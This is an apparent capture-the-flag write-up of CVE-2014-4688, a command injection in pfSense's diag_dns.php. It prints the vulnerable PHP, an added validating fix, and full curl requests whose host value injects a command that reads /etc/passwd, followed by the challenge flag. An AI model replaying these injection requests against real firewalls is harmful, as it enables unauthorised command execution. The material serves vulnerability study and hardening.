0x0 Vulnerability information
- pfSense is an open-source, commercially backed firewall with a long history and a large user base
- CVE ID: CVE-2014-4688, reference link
- Explanations of this vulnerability found online are all vague, and some were published without ever being tested
- This article is based on an installation and test in a real environment
0x1 Root cause
- Install from the provided ISO and extract the target page:
diag_dns.php
    /* Cheap hack to support both $_GET and $_POST */
    if ($_GET['host'])
        $_POST = $_GET;

    if ($_GET['createalias'] == "true") {
        $host = trim($_POST['host']);
        if ($_GET['override'])
            $override = true;
        $a_aliases = &$config['aliases']['alias'];
        $type = "hostname";
        $resolved = gethostbyname($host);
        if ($resolved) {
            $host = trim($_POST['host']);
            /* user input is interpolated straight into a shell command line, unescaped */
            $dig = `dig "$host" A | grep "$host" | grep -v ";" | awk '{ print $5 }'`;
            /* ... remainder of the alias-creation branch omitted ... */
        }
    }
- Here $_POST['host'] is passed straight into the dig "$host" ... command line and executed, so this is command injection. Note that gethostbyname() returns its argument unchanged when the name does not resolve, so the if($resolved) check does nothing to keep a non-hostname value away from the backtick operator.
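Hardening the sink described above, as an added example that is not part of the original post and is not pfSense's own patch for CVE-2014-4688: the lookup target is validated as an IP address or a plain hostname before anything runs, and only then handed to dig as a single quoted argument. The function names (is_valid_lookup_target, lookup_hardened, demo) and the sample inputs are constructed for this illustration.

```php
<?php
// Added example, not pfSense's code and not its actual fix for CVE-2014-4688.
// It contrasts the unsafe backtick sink from diag_dns.php with a hardened lookup
// that validates the target first and only then passes it as a quoted argument.
// Function names (is_valid_lookup_target, lookup_hardened, demo) are hypothetical.

// Accept only what a DNS lookup page legitimately needs: an IP address or a
// hostname built from labels of letters, digits and hyphens. Everything else
// (quotes, spaces, ';', '|', '>') is refused outright instead of being escaped.
function is_valid_lookup_target(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // RFC 1123 style: 1-253 chars, labels of 1-63 chars, no leading or
    // trailing hyphen. A leading hyphen is refused so the value can never be
    // mistaken for a dig option, even after quoting.
    return (bool) preg_match(
        '/^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$/',
        $host
    );
}

// Hardened replacement for the backtick line in the writeup. Returns null when
// the input is rejected, so the caller can report an error rather than run
// anything. +short makes the grep/awk post-processing unnecessary.
function lookup_hardened(string $host): ?string
{
    $host = trim($host);
    if (!is_valid_lookup_target($host)) {
        return null;
    }
    // Validation is the real control; escapeshellarg() is defence in depth so
    // the value always reaches dig as exactly one argument.
    $cmd = 'dig ' . escapeshellarg($host) . ' A +short';
    $out = shell_exec($cmd);
    return $out === false ? null : $out;
}

// Constructed inputs: a hostname, an IPv4 address, a value with the same shape
// as the injection payload shown in the exploitation section, and an
// option-looking value. Nothing is executed here; only the validator runs.
function demo(): array
{
    $inputs = [
        'example.com',
        '1.2.3.4',
        '1";md5 /etc/passwd >pick.txt;',
        '-x',
    ];
    $result = [];
    foreach ($inputs as $in) {
        $result[$in] = is_valid_lookup_target($in) ? 'accepted' : 'rejected';
    }
    return $result;
}

print_r(demo());
```

Run it with php on the command line: demo() accepts the hostname and the address and rejects the two other inputs, because the validator never sees quotes, spaces or a leading hyphen as legitimate. Rejecting rather than escaping is the point: escapeshellarg() alone would still let a value beginning with "-" be parsed by dig as an option, which is why the regex forbids it and why the quoting is treated only as a second layer.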
0x2 Exploitation
First, use the feature once in Chrome the normal way.
Then use Burp Suite or curl to intercept/replay the request:
    curl 'http://1.2.3.4:8080/diag_dns.php' \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'Origin: http://1.2.3.4:8080' \
      -H 'Upgrade-Insecure-Requests: 1' \
      -H 'DNT: 1' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \
      -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
      -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \
      -H 'Accept-Language: zh-CN,zh;q=0.9' \
      -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \
      --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1.2.3.4&Submit=DNS+Lookup' \
      --compressed \
      --insecure
Next, add the createalias GET parameter and inject into the host parameter. The key parts are:
    curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true'
    &host=1";md5 /etc/passwd >pick.txt;&
The modified request is as follows:
    curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true' \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'Origin: http://1.2.3.4:8080' \
      -H 'Upgrade-Insecure-Requests: 1' \
      -H 'DNT: 1' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \
      -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
      -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \
      -H 'Accept-Language: zh-CN,zh;q=0.9' \
      -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \
      --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1";md5 /etc/passwd >pick.txt;&Submit=DNS+Lookup' \
      --compressed \
      --insecure
Finally, open pick.txt in the browser to obtain the result of the command execution.
- Per the challenge requirements, the flag is:
flag{0ca0c0336fc307ab3d7fcc3e33590d41}